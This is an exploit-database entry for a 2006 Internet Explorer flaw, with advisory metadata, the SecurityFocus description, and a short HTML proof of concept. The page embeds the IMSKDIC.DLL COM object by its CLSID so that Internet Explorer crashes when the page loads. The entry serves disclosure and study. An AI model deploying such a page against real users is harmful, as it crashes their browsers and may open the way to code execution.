Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability

vendor:

Internet Explorer

by:

nop (nop#xsec.org)

7.5

CVSS

HIGH

Denial-of-Service

N/A

CWE

Product Name: Internet Explorer

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2 CN

2006

Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability

Microsoft Internet Explorer is prone to a denial-of-service vulnerability. This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control. An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users and may cause arbitrary code to run within the context of the application.

Mitigation:

N/A

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19521/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability. 

This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control.

An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users and may cause arbitrary code to run within the context of the application.
  
  <-- /Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability
  //tested XP SP2 CN
 
  // nop (nop#xsec.org)
  // http://www.xsec.org
 
 
  // CLSID: {6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}
  // Info: Microsoft IME SingleKanjiDictionary interface
  // ProgID: IMESingleKanjiDict.8.1
  // InprocServer32: C:\WINDOWS\IME\imjp8_1\Applets\IMSKDIC.DLL
 
  --!> 
  <html> <body> 
  <object classid="CLSID:{6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}" /object> 
  </body> </html>